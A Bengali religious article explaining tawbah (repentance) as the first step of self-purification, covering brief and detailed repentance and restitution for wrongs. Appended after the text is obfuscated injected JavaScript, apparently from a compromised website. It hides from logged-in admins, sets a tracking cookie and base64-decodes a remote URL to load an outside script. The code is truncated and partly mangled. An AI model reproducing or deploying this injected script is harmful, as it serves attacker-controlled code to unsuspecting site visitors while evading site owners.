‘তওবা’ আত্মশুদ্ধির প্রথম ধাপ বা সিঁড়ি। যখন কোন মানুষ নিজের সংশোধনের জন্য অগ্রসর হবে তখন সর্বপ্রথম তাকে পরিপূর্ণ রূপে তওবা করতে হবে অর্থাৎ অতীতে তার দ্বারা যত গুনাহ ও ভুলভ্রান্তি হয়েছে আল্লাহর দরবারে সবগুলোর বিষয়ে ক্ষমা চেয়ে নেবে ইমাম গাজ্জালী (রহ.) ‘ইহয়াউল উলুম’ কিতাবে তাওবার আলোচনার শুরুতে লিখেছেন ; ‘اول اقدام المريدين التوبة’ যেসব মুরিদ আত্মশুদ্ধির উদ্দেশ্য নিয়ে শায়খ এর কাছে যাবে, তাদের সর্বপ্রথম কাজ হল পরিপূর্ণ তওবা করা। এজন্য আল্লাহ ওয়ালাদের কাছে প্রচলিত পদ্ধতি এই যে, যে ব্যক্তিকে আল্লাহ তাআলা আত্মশুদ্ধির ফিকির দান করেন এবং তাঁরা নিজেদের আত্মশুদ্ধির জন্য কোন শায়খের দরবারে যায় তখন তাকে সর্বপ্রথম পরিপূর্ণ তওবা করতে বলা হয়। অর্থাৎ প্রথমে নিজের অতীত জীবনের সব গুনাহ থেকে তাওবা করবে এবং তার মাধ্যমে অতীত জীবনের যাবতীয় গুনাহের পঙ্কিলতা থেকে নিজেকে নিজে ধুয়ে-মুছে পরিষ্কার করে নেবে। এভাবে তওবা করে যখন নতুন জীবন সূচনা করবে, তখন তার প্রতি আল্লাহর রহমত ধাবিত হবে। এজন্য তাওবার গুরুত্ব অপরিসীম এবং আত্মশুদ্ধির পথে ইহা প্রথম সিঁড়ি। সংক্ষিপ্ত তাওবা : তাওবা আবার দুই প্রকার য: (এক) সংক্ষিপ্ত তওবা। (দুই) বিস্তারিত তওবা। সংক্ষিপ্ত তওবা এই যে, এ পর্যন্ত যত গুনাহ হয়েছে, একবার বসে ঐ সব গুনাহ থেকে একসঙ্গে আল্লাহর দরবারে তওবা করবে। তাওবা করার আগে তাওবার নিয়তে দু’রাকাত নফল নামাজ পড়বে। তারপর আল্লাহর উদ্দেশ্যে এভাবে বলবে, হে আল্লাহ! এ পর্যন্ত আমার দ্বারা যত গুনাহ হয়েছে, যত ভুল-ভ্রান্তি হয়েছে, যত ত্রুটি হয়েছে, হে আল্লাহ! ঐ সকল গুনাহ থেকে আমি মাপ চাই। আমি আপনার কাছে তওবা করছি এবং আগামীতে সব গুনাহ না করার সংকল্প করছি। ইহাই হলো সংক্ষিপ্ত তওবা। এটি হলো প্রথম কাজ। বিস্তারিত তাওবা : এরপর দ্বিতীয় পর্যায় হলো বিস্তারিত তাওবা : বিস্তারিত তওবার ব্যাখ্যা এই যে যত গুনাহ হয়েছে তার মধ্যে যে সব গুনাহের ক্ষতিপূরণ সম্ভব, সেগুলোর ক্ষতিপূরণ করতে হবে। ক্ষতিপূরণ সম্ভব হলে পরিপূর্ণ করে নেবে। তাওবার ক্ষেত্রে নিয়ম হলো, যে গুনাহের ক্ষমা চাচ্ছে, কোনভাবে যদি তার ক্ষতিপূরণ সম্ভব হয়, তাহলে তার ক্ষতি পূরণ করতে হবে। যেমন কারো টাকা আত্মসাৎ করেছে, এখন সে বসে বসে তওবা করছে যে, আল্লাহ আমাকে মাফ করে দিন। তাওবা কবুল হবে না। এ কারণে যে, যে ব্যক্তির টাকা আত্মসাৎ করেছে, যতক্ষণ পর্যন্ত তার টাকা ফেরত না দেবে, তার থেকে মাপ চেয়ে না নিবে, ততক্ষণ পর্যন্ত তাওবা কবুল হবে না। কারণ এ অবস্থায় ক্ষতিপূরণ সম্ভব। কিংবা যখন কারো অন্তরে ব্যথা দিয়েছে, বা কাউকে কষ্ট দিয়েছে, তার ক্ষতিপূরণ সম্ভব। তা এই যে, তার থেকে মাপ চেয়ে নিবে। আল্লাহর হকের বিষযয়ে তওবা করার ক্ষেত্রে ও এই একই নিয়ম। যেমন তুমি যাকাত দাওনি, যেহেতু এর ক্ষতিপূরণ সম্ভব, তাই যাকাত পরিশোধ করতে হবে। তাওবা করার সঙ্গে সঙ্গে যে বিষয়ে ক্ষতিপূরণ আদায় করা সম্ভব, ক্ষতি পূরণ আদায় করতে হবে। এমন এভাবে যদি নামাজ ছুটে গিয়ে থাকে, তার রোজা বাদ পড়ে থাকে, তাহলে আগে সেগুলোর ক্ষতিপূরণ আদায় করতে হবে। তারপর আল্লাহ তা’আলার দরবারে মাপ চেয়ে নিবে। এটা হল বিস্তারিত তওবা। আল্লাহ তাআলা আমাদের সকলকে প্রকৃত তওবার মাধ্যমে আত্মশুদ্ধি অর্জন করে আল্লাহ তায়ালার মোহাব্বত অন্তরে ধারণ করার তৌফিক দান করুন। ‘আমিন’      (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1;
